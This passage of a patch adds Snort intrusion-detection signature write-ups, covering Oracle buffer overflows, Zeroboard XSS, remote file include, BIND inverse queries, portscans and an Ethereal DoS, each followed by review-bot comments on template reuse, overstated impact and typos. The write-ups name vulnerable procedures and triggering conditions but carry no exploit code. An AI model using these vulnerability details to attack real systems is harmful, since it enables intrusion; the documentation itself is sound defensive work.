+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "$s_file_name" parameter in the "write_ok.php" 
+script used by the "Zeroboard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Zeroboard
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
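Review bot: Impact and the second Detailed Information paragraph are copied from the remote-file-include template and overstate a cross-site scripting issue: "system integrity compromise", "administrative access to the server" and "execute system binaries" are not outcomes of XSS via the "$s_file_name" parameter. The Attack Scenarios paragraph (a malicious link designed to steal information from the user clicking it) describes the real impact, so align Impact with it: script execution in the victim's browser, theft of session data or credentials, not code execution on the server. Formatting: no blank line before the "--" separator after Sid, after Affected Systems and after Contributors, unlike the sibling files.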
--- /dev/null
+++ b/doc/signatures/377.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+377
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Network Toolbox 3 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Network Toolbox 3 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS161
+
+--
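Review bot: typo "legimately" in False Positives (legitimately), and "Steven Alexander<alexander.s@mccd.edu>" in Contributors is missing the space before the address. Max Vision's address is given as vision@whitehats.org here but as vision@whitehats.com in the other files in this patch (for example 671.txt); one of the two is wrong. Detailed Information says the echo request "contains a unique payload in the message request" without saying what it is; name the payload the rule matches so the False Positives entry can be judged against it.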
--- /dev/null
+++ b/doc/signatures/2792.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2792
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_master_log
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
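Review bot: Detailed Information has the same template defect as the other Oracle entries: "purge_master_log" ends one line and the next begins ". This procedure is included in"; merge them into a single sentence. The package is given here as "dbms_repcat" without the "sys." prefix used for sys.dbms_repcat_sna and sys.dbms_repcat_fla in the neighbouring files; confirm whether that is intentional. Impact lists "Denial of Service" but Detailed Information and Attack Scenarios only describe code execution. Affected Systems reads "Oracle Oracle9i", and Additional References is empty.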
--- /dev/null
+++ b/doc/signatures/100000485.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000485
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "RahnemaCo" application running on a webserver. 
+Access to the file "page.php" using a remote file being passed as the "osCsid" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "osCsid" parameter in the "page.php" script used by the 
+"RahnemaCo" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using RahnemaCo
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2630.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2630
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "register_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
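Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"" is tuning advice placed in Detailed Information with no explanation; move it to Corrective Action or a tuning note and say why it matters (the rule only inspects traffic to the ports listed in the $ORACLE_PORTS variable, so an installation listening elsewhere never generates this event). Attack Scenarios says the attack "requires an attacker to logon to the database with a valid username and password combination", which should be reflected in Ease of Attack ("Simple.") and in Impact, since it limits the exposure to authenticated users. Also "a Oracle database implementation" (an Oracle), and Affected Systems is indented with spaces while the sibling files use a tab.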
--- /dev/null
+++ b/doc/signatures/2813.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2813
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure abort_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
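Review bot: same broken sentence as in the other Oracle entries: "abort_flavor_definition" ends a line and ". This procedure is included in" starts the next; join them into one sentence naming sys.dbms_repcat_fla. Affected Systems reads "Oracle Oracle9i", Ease of Attack "Simple." is not supported by an Attack Scenarios paragraph that only says the overflow "may be possible", and Additional References is empty.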
--- /dev/null
+++ b/doc/signatures/1715.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1715
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
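Review bot: this file says nothing about what SID 1715 matches; every section is the generic CGI template, so the alert is not actionable and cannot be tuned. Add the URI or content the rule looks for and the application it concerns. Typo "ona web server" in Detailed Information, and the line ending "can be exploited by the attacker." runs well past the wrap width used elsewhere in the file; rewrap it. Additional References is empty.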
--- /dev/null
+++ b/doc/signatures/252.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+252
+
+--
+Summary:
+This event is generated when an attempt is made to send an inverse query
+to a DNS server. This could indicate a future attack.
+
+--
+Impact:
+Intelligence gathering. This is just an attempt to see if the DNS server
+responds to such a query.
+
+--
+Detailed Information:
+Certain versions of BIND fail to propery bound data recieved when 
+handling an inverse query. Upon being copied to memory, portions of the 
+program can be overwritten and arbitrary commands can be run on the 
+affected host.
+
+--
+Affected Systems:
+	BIND pre 8.1.2 / 4.9.8
+
+--
+Attack Scenarios:
+An attacker can send the reverse query and if the server responds the 
+attacker might then proceed to exploit the flaw in Bind.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade BIND.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+RFC:
+http://www.rfc-editor.org/rfc/rfc1035.txt
+
+Bugtraq:
+http://www.securityfocus.com/bid/134
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009
+
+Arachnids:
+http://www.whitehats.com/info/IDS277 
+
+--
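Review bot: the Summary describes an "inverse query" while Attack Scenarios calls it "the reverse query"; an inverse query (IQUERY) is not a reverse lookup, so use one term throughout, and spell the product consistently ("BIND", not "Bind"). Impact says this is "just an attempt to see if the DNS server responds", but Detailed Information describes a memory-corruption flaw in handling inverse queries; state whether the rule fires on any inverse query or only on a malformed one, since that decides how serious an alert is. Typos: "propery", "recieved". Corrective Action "Upgrade BIND." should name the fixed versions, which Affected Systems already implies ("BIND pre 8.1.2 / 4.9.8"). The Arachnids URL has a trailing space.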
--- /dev/null
+++ b/doc/signatures/122-2.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-2
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp decoy
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
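Review bot: the only event-specific content in this file is the phrase "tcp decoy portscan" in the Summary; the rest is the shared sfPortscan template, so add a sentence explaining what distinguishes a decoy scan (the scanning host sends probes that appear to come from several spoofed source addresses as well as its own, so the real scanner is only one of the sources seen) and what that means for the analyst, since the source address on the alert cannot be trusted. Typos: "reconnaisance", "consititute". "Apply any appropriate vendor supplied patches as appropriate." repeats itself. Two leading blank lines precede "Rule:", unlike most sibling files.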
--- /dev/null
+++ b/doc/signatures/122-12.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-12
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+distributed protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
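Review bot: this file is byte-for-byte the 122-2.txt template apart from "an ip distributed protocol scan" in the Summary, so the reader is given nothing about this event type; add a sentence describing a distributed protocol scan as the sfPortscan README the file points to defines it (several source hosts probing IP protocol numbers against one target), and note that the "Attack Scenarios" text about determining "application versions" does not apply to a protocol scan, which enumerates supported IP protocols rather than services. Typos: "reconnaisance", "consititute"; redundant "Apply any appropriate vendor supplied patches as appropriate."; two leading blank lines before "Rule:".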
--- /dev/null
+++ b/doc/signatures/3051.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3051
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
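Review bot: Detailed Information says a large ACL "combined with a specified ACE size of 0" causes the DoS but not what the parser does with it (whether it hangs, loops or crashes), which the analyst needs to judge the Impact of "Serious. Denial of Service (DoS)."; add one sentence on the failure mode. Corrective Action "Upgrade to the latest non-affected version of the software." should name the first fixed release, since Affected Systems gives "Ethereal 0.10.7 and prior". Attack Scenarios should also say that the crafted data only needs to be captured by Ethereal, not delivered to a service, which is why the analyser itself is the victim. Additional References is empty.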
--- /dev/null
+++ b/doc/signatures/1711.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1711
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
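Review bot: The Detailed Information and Attack Scenarios sections are generic CGI boilerplate that never identifies the script or request SID 1711 matches, so an analyst triaging this alert cannot tell from the file what was requested or which product is affected; please name the targeted CGI program and add at least one vendor advisory or CVE reference under the empty Additional References section. Also fix "running ona web server" (should be "on a web server") in Detailed Information and "the attackers choosing" (should be "the attacker's choosing") in Impact and Detailed Information.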
--- /dev/null
+++ b/doc/signatures/1117.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1117
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
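Review bot: The description for SID 1117 is the same generic web server text reused for 1671.txt later in this patch and gives the analyst nothing specific to verify: Detailed Information says only that "attack scenarios are legion" and Additional References is empty. Please state which request pattern or vulnerable application the rule detects and add a reference; without that, "False Positives: None known." cannot be justified for a signature whose scope is "All systems using a web server." The apostrophe is missing in "attackers choosing" under Impact.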
--- /dev/null
+++ b/doc/signatures/1798.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1798
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "erotica".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "erotica".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
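Review bot: The Summary line is garbled: "This rule indicates that a webpage was visited the included the content "erotica"" should read "a webpage was visited that included the content "erotica"". Two layout problems as well: the value "1798" is separated from its "Sid:" label by a blank line, unlike every other file here, and Additional References is followed by seven empty "+" lines before the closing "--"; both should be tidied. In False Positives, "the snort rule descriptions on the snort website. etc.etc." should capitalise Snort and drop the "etc.etc.". The statement under Attack Scenarios that this is "Not an attack" is the most useful caveat in the file and deserves a mention in the Summary too, since the Impact wording makes this policy alert read like a security event.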
--- /dev/null
+++ b/doc/signatures/1395.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1395
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
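Review bot: Same generic CGI boilerplate as 1711.txt, with the same defects: no indication of which CGI script or request SID 1395 actually matches, an empty Additional References section, and the typos "running ona web server" and "attackers choosing". Each of these SIDs should carry its own specific description and reference so analysts can tell the alerts apart.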
--- /dev/null
+++ b/doc/signatures/1712.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1712
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
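Review bot: This file for SID 1712 repeats the 1711.txt text verbatim, down to the "running ona web server" typo; with no named script and nothing under Additional References, an analyst cannot distinguish alerts from the two rules. Please replace the boilerplate with the specific request the rule looks for and a link to the corresponding advisory.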
--- /dev/null
+++ b/doc/signatures/3068.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+3068
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"examine" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
